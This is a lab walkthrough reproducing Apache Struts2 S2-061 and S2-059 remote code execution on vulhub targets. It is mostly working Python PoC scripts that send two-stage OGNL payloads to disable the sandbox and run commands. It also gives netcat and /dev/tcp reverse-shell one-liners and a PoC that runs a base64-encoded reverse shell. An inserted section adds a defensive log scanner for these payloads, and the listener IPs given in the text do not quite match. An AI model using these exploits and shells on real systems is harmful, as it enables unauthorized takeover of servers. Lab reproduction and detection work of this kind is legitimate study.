1. Install and start the vulhub target environment
(1) Start the s2-061 target
(2) Start the s2-059 target
2. Vulnerability reproduction
(1) s2-061 reproduction
Get the exploit tool from GitHub
Start exploiting
(2) s2-059 reproduction
Create an empty file in the Linux-specific temporary directory /tmp. Since a file with that name normally does not exist there, creating it serves as a verification command for command execution.
The success file has been created under /tmp/, which shows the exploit worked.
The PoC used is as follows:
```python
import requests

url = "http://10.1.1.101:8080"

# Stage 1: OGNL expression in the id parameter clears the OgnlUtil
# excluded class/package lists (the sandbox restrictions).
data1 = {
    "id": "%{(#context=#attr['struts.valueStack'].context).(#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.setExcludedClasses('')).(#ognlUtil.setExcludedPackageNames(''))}"
}

# Stage 2: with restrictions lifted, reset member access and run the
# verification command (creates /tmp/success on the target).
data2 = {
    "id": "%{(#context=#attr['struts.valueStack'].context).(#context.setMemberAccess(@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)).(@java.lang.Runtime@getRuntime().exec('touch /tmp/success'))}"
}

res1 = requests.post(url, data=data1)
# print(res1.text)
res2 = requests.post(url, data=data2)
# print(res2.text)
```
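The two-stage request above leaves distinctive markers in the request body (the OGNL opener, the value-stack context lookup, the sandbox-disabling calls and the Runtime.exec sink). The following is an added detection example, not code from the original post: it scans constructed request-log lines in a hypothetical "<src_ip> <method> <path> <body>" format and classifies each body by which stage of this S2-059 payload it carries.

```python
import re
from urllib.parse import unquote_plus

# Indicator patterns derived from the S2-059 request bodies shown in this
# write-up, matched after URL-decoding. Each maps to the attack stage it reveals.
INDICATORS = {
    "ognl-expression": re.compile(r"%\{.*\}"),
    "valuestack-context": re.compile(r"#attr\['struts\.valueStack'\]\.context"),
    "sandbox-bypass": re.compile(r"setMemberAccess|setExcludedClasses|setExcludedPackageNames"),
    "exec-sink": re.compile(r"@java\.lang\.Runtime@getRuntime\(\)\.exec"),
}
SEVERITY = {"exec-sink": "critical", "sandbox-bypass": "high",
            "valuestack-context": "high", "ognl-expression": "medium"}
ORDER = ["critical", "high", "medium"]  # most severe first

def classify_body(body):
    """Return (severity, [indicator names]) for one form-encoded POST body.
    Severity is None when no OGNL-like content is present."""
    decoded = unquote_plus(body)  # payloads may arrive percent-encoded
    hits = [name for name, rx in INDICATORS.items() if rx.search(decoded)]
    if not hits:
        return None, []
    return min((SEVERITY[h] for h in hits), key=ORDER.index), hits

# Hypothetical log format (assumed, not from the page): "<src_ip> <method> <path> <body>"
LOG_RE = re.compile(r"^(\S+) (\S+) (\S+) (.*)$")

def scan_log(lines):
    """Return one alert dict per line whose body carries OGNL injection markers."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        src, method, path, body = m.groups()
        sev, hits = classify_body(body)
        if sev:
            alerts.append({"src": src, "path": path, "severity": sev, "indicators": hits})
    return alerts

# Constructed sample log: one benign request, the percent-encoded stage-1
# payload, and the plain stage-2 payload from the PoC above.
SAMPLE_LOG = [
    "10.1.1.50 POST /index.action id=123",
    "10.1.1.50 POST /index.action id=%25%7B(%23context%3D%23attr%5B'struts.valueStack'%5D.context).(%23ognlUtil.setExcludedClasses(''))%7D",
    "10.1.1.50 POST /index.action id=%{(#context=#attr['struts.valueStack'].context).(#context.setMemberAccess(@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)).(@java.lang.Runtime@getRuntime().exec('touch /tmp/success'))}",
]

if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert)
```

Because the check runs on the decoded body, a rule like this belongs at the WAF or reverse proxy in front of Struts, or over access logs that retain POST bodies.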
3. Reverse shell
Controller: nc -lvvp 6666
Controlled host: nc 10.1.1.101 6666 -e /bin/bash
bash -i >& /dev/tcp/10.1.1.101/6666 0>&1 (if nc is not installed on the controlled host, bash can be used instead; any Linux host can connect this way)
https://www.cnblogs.com/lingzhisec/p/13917529.html
Execute the reverse shell command on the victim
Listen on the controller
The PoC that executes the reverse shell is as follows:
```python
import requests

url = "http://10.1.1.101:8080"

# Stage 1: clear the OgnlUtil excluded class/package lists.
data1 = {
    "id": "%{(#context=#attr['struts.valueStack'].context).(#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.setExcludedClasses('')).(#ognlUtil.setExcludedPackageNames(''))}"
}

# Stage 2: run the base64-wrapped reverse shell command via Runtime.exec.
data2 = {
    "id": "%{(#context=#attr['struts.valueStack'].context).(#context.setMemberAccess(@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)).(@java.lang.Runtime@getRuntime().exec('bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xLjEuMTAwLzY2NjYgMD4mMQo=}|{base64,-d}|{bash,-i}'))}"
}

res1 = requests.post(url, data=data1)
res2 = requests.post(url, data=data2)
```